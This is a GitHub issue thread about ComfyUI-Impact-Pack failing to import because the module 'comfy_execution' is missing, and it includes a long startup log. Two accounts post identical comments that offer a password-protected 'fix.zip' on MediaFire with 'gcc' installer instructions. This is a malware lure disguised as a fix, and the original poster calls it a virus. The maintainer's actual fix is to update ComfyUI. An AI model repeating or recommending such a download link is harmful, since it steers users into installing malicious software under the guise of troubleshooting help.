### ISSUE TITLE
Cannot import ComfyUI-Impact-Pack module for custom nodes: No module named 'comfy_execution'

### ISSUE THREAD

**Issue by BNK-3R** [ltdrdata/ComfyUI-Impact-Pack#722]
As the title says, I can't import the Impact Pack. Updating, reinstalling, cloning from Git directly, and installing the required dependencies all failed me. I also tried searching for this module manually on Google, but to no avail.

In the log, it refers to util_nodes.py, line 3: from comfy_execution.graph import ExecutionBlocker, but I don't know where this file is to check if I have it.

Log here:

## ComfyUI-Manager: installing dependencies done.
[2024-08-26 16:55] ** ComfyUI startup time: 2024-08-26 16:55:19.207049
[2024-08-26 16:55] ** Platform: Windows
[2024-08-26 16:55] ** Python version: 3.11.9 (tags/v3.11.9:de54cf5, Apr  2 2024, 10:12:12) [MSC v.1938 64 bit (AMD64)]
[2024-08-26 16:55] ** Python executable: D:\Stable_Diffiusion\ComfyUI_windows_portable\python_embeded\python.exe
[2024-08-26 16:55] ** ComfyUI Path: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI
[2024-08-26 16:55] ** Log path: D:\Stable_Diffiusion\ComfyUI_windows_portable\comfyui.log
[2024-08-26 16:55] 
Prestartup times for custom nodes:
[2024-08-26 16:55]    0.0 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\rgthree-comfy
[2024-08-26 16:55]    1.8 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Manager
[2024-08-26 16:55] 
Total VRAM 12282 MB, total RAM 32627 MB
[2024-08-26 16:55] pytorch version: 2.4.0+cu121
[2024-08-26 16:55] Set vram state to: NORMAL_VRAM
[2024-08-26 16:55] Device: cuda:0 NVIDIA GeForce RTX 4070 : cudaMallocAsync
[2024-08-26 16:55] Using pytorch cross attention
[2024-08-26 16:55] [Prompt Server] web root: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\web
[2024-08-26 16:55] D:\Stable_Diffiusion\ComfyUI_windows_portable\python_embeded\Lib\site-packages\kornia\feature\lightglue.py:44: FutureWarning: `torch.cuda.amp.custom_fwd(args...)` is deprecated. Please use `torch.amp.custom_fwd(args..., device_type='cuda')` instead.
  @torch.cuda.amp.custom_fwd(cast_inputs=torch.float32)
[2024-08-26 16:55] [AnimateDiffEvo] - [0;31mERROR[0m - No motion models found. Please download one and place in: ['D:\\Stable_Diffiusion\\ComfyUI_windows_portable\\ComfyUI\\custom_nodes\\ComfyUI-AnimateDiff-Evolved\\models', 'D:\\Stable_Diffiusion\\ComfyUI_windows_portable\\ComfyUI\\models\\animatediff_models']
[2024-08-26 16:55] Adding D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes to sys.path
[2024-08-26 16:55] 
[36mEfficiency Nodes:[0m Attempting to add Control Net options to the 'HiRes-Fix Script' Node (comfyui_controlnet_aux add-on)...[92mSuccess![0m
[2024-08-26 16:55] Loaded Efficiency nodes from D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\efficiency-nodes-comfyui
[2024-08-26 16:55] Loaded ControlNetPreprocessors nodes from D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui_controlnet_aux
[2024-08-26 16:55] Loaded AdvancedControlNet nodes from D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Advanced-ControlNet
[2024-08-26 16:55] Could not find AnimateDiff nodes
[2024-08-26 16:55] Loaded IPAdapter nodes from D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI_IPAdapter_plus
[2024-08-26 16:55] Could not find VideoHelperSuite nodes
[2024-08-26 16:55] ### Loading: ComfyUI-Impact-Pack (V7.2.2)
[2024-08-26 16:55] ### Loading: ComfyUI-Impact-Pack (Subpack: V0.6)
[2024-08-26 16:55] ### Loading: ComfyUI-Impact-Pack (V7.2.2)
[2024-08-26 16:55] Could not load ImpactPack nodes No module named 'comfy_execution'
[2024-08-26 16:55] ### Loading: ComfyUI-Impact-Pack (V7.2.2)
[2024-08-26 16:55] Traceback (most recent call last):
  File "D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\nodes.py", line 1982, in load_custom_node
    module_spec.loader.exec_module(module)
  File "<frozen importlib._bootstrap_external>", line 940, in exec_module
  File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
  File "D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Impact-Pack\__init__.py", line 78, in <module>
    from .modules.impact.util_nodes import *
  File "D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Impact-Pack\modules\impact\util_nodes.py", line 3, in <module>
    from comfy_execution.graph import ExecutionBlocker
ModuleNotFoundError: No module named 'comfy_execution'

[2024-08-26 16:55] Cannot import D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Impact-Pack module for custom nodes: No module named 'comfy_execution'
[2024-08-26 16:55] A new version of Albumentations is available: 1.4.14 (you have 1.4.13). Upgrade using: pip install -U albumentations. To disable automatic update checks, set the environment variable NO_ALBUMENTATIONS_UPDATE to 1.
[2024-08-26 16:55] Total VRAM 12282 MB, total RAM 32627 MB
[2024-08-26 16:55] pytorch version: 2.4.0+cu121
[2024-08-26 16:55] Set vram state to: NORMAL_VRAM
[2024-08-26 16:55] Device: cuda:0 NVIDIA GeForce RTX 4070 : cudaMallocAsync
[2024-08-26 16:55] ### Loading: ComfyUI-Manager (V2.50.2)
[2024-08-26 16:55] ### ComfyUI Revision: 2539 [f1d6cef7] | Released on '2024-08-14'
[2024-08-26 16:55] [ComfyUI-Manager] default cache updated: https://raw.githubusercontent.com/ltdrdata/ComfyUI-Manager/main/model-list.json
[2024-08-26 16:55] [ComfyUI-Manager] default cache updated: https://raw.githubusercontent.com/ltdrdata/ComfyUI-Manager/main/alter-list.json
[2024-08-26 16:55] [ComfyUI-Manager] default cache updated: https://raw.githubusercontent.com/ltdrdata/ComfyUI-Manager/main/github-stats.json
[2024-08-26 16:55] [ComfyUI-Manager] default cache updated: https://raw.githubusercontent.com/ltdrdata/ComfyUI-Manager/main/custom-node-list.json
[2024-08-26 16:55] [ComfyUI-Manager] default cache updated: https://raw.githubusercontent.com/ltdrdata/ComfyUI-Manager/main/extension-node-map.json
[2024-08-26 16:55] json_repair## OK
[2024-08-26 16:55] --------------
[2024-08-26 16:55] [91m ### Mixlab Nodes: [93mLoaded
[2024-08-26 16:55] ChatGPT.available True
[2024-08-26 16:55] edit_mask.available True
[2024-08-26 16:55] ## clip_interrogator_model not found: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\models\clip_interrogator\Salesforce\blip-image-captioning-base, pls download from https://huggingface.co/Salesforce/blip-image-captioning-base
[2024-08-26 16:55] ClipInterrogator.available True
[2024-08-26 16:55] ## text_generator_model not found: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\models\prompt_generator\text2image-prompt-generator, pls download from https://huggingface.co/succinctly/text2image-prompt-generator/tree/main
[2024-08-26 16:55] ## zh_en_model not found: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\models\prompt_generator\opus-mt-zh-en, pls download from https://huggingface.co/Helsinki-NLP/opus-mt-zh-en/tree/main
[2024-08-26 16:55] PromptGenerate.available True
[2024-08-26 16:55] ChinesePrompt.available True
[2024-08-26 16:55] RembgNode_.available True
[2024-08-26 16:55] ffmpeg could not be found. Using ffmpeg from imageio-ffmpeg.
[2024-08-26 16:55] TripoSR.available
[2024-08-26 16:55] MiniCPMNode.available
[2024-08-26 16:55] [93m -------------- [0m
[2024-08-26 16:55] Failed to auto update `Quality of Life Suit` 
[2024-08-26 16:55] [33mQualityOfLifeSuit_Omar92_DIR:[0m D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-QualityOfLifeSuit_Omar92
[2024-08-26 16:55] here: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-tbox
[2024-08-26 16:55] Using ckpts path: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-tbox\..\..\models\annotator
[2024-08-26 16:55] Using symlinks: False
[2024-08-26 16:55] Using ort providers: ['CUDAExecutionProvider', 'DirectMLExecutionProvider', 'OpenVINOExecutionProvider', 'ROCMExecutionProvider', 'CPUExecutionProvider']
[2024-08-26 16:55] (pysssss:WD14Tagger) [DEBUG] Available ORT providers: TensorrtExecutionProvider, CUDAExecutionProvider, CPUExecutionProvider
[2024-08-26 16:55] (pysssss:WD14Tagger) [DEBUG] Using ORT providers: CUDAExecutionProvider, CPUExecutionProvider
[2024-08-26 16:55] [08/26/24 16:55:31] WARNING  Your inference package version 0.9.13 is out of date! Please upgrade to     __init__.py:35
[2024-08-26 16:55]                              version 0.16.2 of inference for the latest features and bug fixes by                      
[2024-08-26 16:55]                              running `pip install --upgrade inference`.                                                
[2024-08-26 16:55] SupervisionWarnings: BoundingBoxAnnotator is deprecated: `BoundingBoxAnnotator` is deprecated and has been renamed to `BoxAnnotator`. `BoundingBoxAnnotator` will be removed in supervision-0.26.0.
[2024-08-26 16:55] ------------------------------------------
[2024-08-26 16:55] [34mComfyroll Studio v1.76 : [92m 175 Nodes Loaded[0m
[2024-08-26 16:55] ------------------------------------------
[2024-08-26 16:55] ** For changes, please see patch notes at https://github.com/Suzie1/ComfyUI_Comfyroll_CustomNodes/blob/main/Patch_Notes.md
[2024-08-26 16:55] ** For help, please see the wiki at https://github.com/Suzie1/ComfyUI_Comfyroll_CustomNodes/wiki
[2024-08-26 16:55] ------------------------------------------
[2024-08-26 16:55] 
[2024-08-26 16:55] [92m[rgthree] Loaded 42 extraordinary nodes.[00m
[2024-08-26 16:55] [92m[rgthree] Will use rgthree's optimized recursive execution.[00m
[2024-08-26 16:55] 
[2024-08-26 16:55] [31mWAS Node Suite [0mError: [0mUnable to load conf file at `D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\was-node-suite-comfyui\was_suite_config.json`. Using internal config template.[0m
[2024-08-26 16:55] [34mWAS Node Suite: [0mOpenCV Python FFMPEG support is enabled[0m
[2024-08-26 16:55] [34mWAS Node Suite [93mWarning: [0m`ffmpeg_bin_path` is not set in `D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\was-node-suite-comfyui\was_suite_config.json` config file. Will attempt to use system ffmpeg binaries if available.[0m
[2024-08-26 16:55] [31mWAS Node Suite [0mError: [0mUnable to load conf file at `D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\was-node-suite-comfyui\was_suite_config.json`. Using internal config template.[0m
[2024-08-26 16:55] [34mWAS Node Suite: [0mFinished.[0m [32mLoaded[0m [0m218[0m [32mnodes successfully.[0m
[2024-08-26 16:55] 
	[3m[93m"The artist's world is limitless. It can be found anywhere, far from where he lives or a few feet away. It is always on his doorstep."[0m[3m - Paul Strand[0m
[2024-08-26 16:55] 
[2024-08-26 16:55] 
Import times for custom nodes:
[2024-08-26 16:55]    0.0 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\websocket_image_save.py
[2024-08-26 16:55]    0.0 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\efficiency-nodes-comfyui
[2024-08-26 16:55]    0.0 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI_IPAdapter_plus
[2024-08-26 16:55]    0.0 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\cg-use-everywhere
[2024-08-26 16:55]    0.0 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Eagle-PNGInfo
[2024-08-26 16:55]    0.0 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\sdxl_prompt_styler
[2024-08-26 16:55]    0.0 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui_controlnet_aux
[2024-08-26 16:55]    0.0 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI_InstantID
[2024-08-26 16:55]    0.0 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-WD14-Tagger
[2024-08-26 16:55]    0.0 seconds (IMPORT FAILED): D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Impact-Pack
[2024-08-26 16:55]    0.0 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-QualityOfLifeSuit_Omar92
[2024-08-26 16:55]    0.0 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Custom-Scripts
[2024-08-26 16:55]    0.0 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui_segment_anything
[2024-08-26 16:55]    0.0 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI_UltimateSDUpscale
[2024-08-26 16:55]    0.0 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI_essentials
[2024-08-26 16:55]    0.0 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\Derfuu_ComfyUI_ModdedNodes
[2024-08-26 16:55]    0.0 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Advanced-ControlNet
[2024-08-26 16:55]    0.0 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\rgthree-comfy
[2024-08-26 16:55]    0.0 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-KJNodes
[2024-08-26 16:55]    0.0 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-AnimateDiff-Evolved
[2024-08-26 16:55]    0.0 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI_Comfyroll_CustomNodes
[2024-08-26 16:55]    0.0 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-tbox
[2024-08-26 16:55]    0.1 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\Comfyui-ergouzi-Nodes
[2024-08-26 16:55]    0.1 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyMath
[2024-08-26 16:55]    0.1 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Manager
[2024-08-26 16:55]    0.2 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-SAM2
[2024-08-26 16:55]    0.4 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-BiRefNet-ZHO
[2024-08-26 16:55]    1.1 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-art-venture
[2024-08-26 16:55]    1.2 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-InstantID
[2024-08-26 16:55]    1.8 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\was-node-suite-comfyui
[2024-08-26 16:55]    1.8 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-YoloWorld-EfficientSAM
[2024-08-26 16:55]    2.8 seconds: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-mixlab-nodes
[2024-08-26 16:55] 
[2024-08-26 16:55] 

[2024-08-26 16:55] 

Starting server
[2024-08-26 16:55] [93mTo see the GUI go to: http://192.168.0.21:8188 or http://127.0.0.1:8188
[2024-08-26 16:55] [93mTo see the GUI go to: https://192.168.0.21:8189 or https://127.0.0.1:8189[0m
[2024-08-26 16:55] D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-mixlab-nodes\webApp\lib/photoswipe-lightbox.esm.min.js
[2024-08-26 16:55] FETCH DATA from: D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Manager\extension-node-map.json [DONE]
[2024-08-26 16:55] D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-mixlab-nodes\webApp\lib/photoswipe.min.css
[2024-08-26 16:55] D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-mixlab-nodes\webApp\lib/pickr.min.js
[2024-08-26 16:55] D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-mixlab-nodes\webApp\lib/juxtapose.min.js
[2024-08-26 16:55] D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-mixlab-nodes\webApp\lib/juxtapose.css
[2024-08-26 16:55] HTTP Request: GET https://api.openai.com/v1/models "HTTP/1.1 401 Unauthorized"
[2024-08-26 16:55] Error: OpenAI API key is invalid OpenAI features wont work for you
[2024-08-26 16:55] [33mQualityOfLifeSuit_Omar92:[0m:NSP ready
[2024-08-26 16:55] [31mWAS Node Suite [0mError: [0mUnable to load conf file at `D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\was-node-suite-comfyui\was_suite_config.json`. Using internal config template.[0m
[2024-08-26 16:55] [31mWAS Node Suite [0mError: [0mUnable to load conf file at `D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\was-node-suite-comfyui\was_suite_config.json`. Using internal config template.[0m
[2024-08-26 16:55] [31mWAS Node Suite [0mError: [0mUnable to load conf file at `D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\was-node-suite-comfyui\was_suite_config.json`. Using internal config template.[0m
[2024-08-26 16:55] [31mWAS Node Suite [0mError: [0mUnable to load conf file at `D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\was-node-suite-comfyui\was_suite_config.json`. Using internal config template.[0m
[2024-08-26 16:55] D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-mixlab-nodes\webApp\lib/classic.min.css
[2024-08-26 16:55] [31mWAS Node Suite [0mError: [0mUnable to load conf file at `D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\was-node-suite-comfyui\was_suite_config.json`. Using internal config template.[0m
[2024-08-26 16:55] [31mWAS Node Suite [0mError: [0mUnable to load conf file at `D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\was-node-suite-comfyui\was_suite_config.json`. Using internal config template.[0m
[2024-08-26 16:55] [31mWAS Node Suite [0mError: [0mUnable to load conf file at `D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\was-node-suite-comfyui\was_suite_config.json`. Using internal config template.[0m
[2024-08-26 16:55] [31mWAS Node Suite [0mError: [0mUnable to load conf file at `D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\was-node-suite-comfyui\was_suite_config.json`. Using internal config template.[0m
[2024-08-26 16:55] data_path:  D:\Stable_Diffiusion\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-mixlab-nodes\data

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by BNK-3R** [comment]
Thats a virus -.-

**Comment by ltdrdata** [comment]
You need to update ComfyUI to latest version.
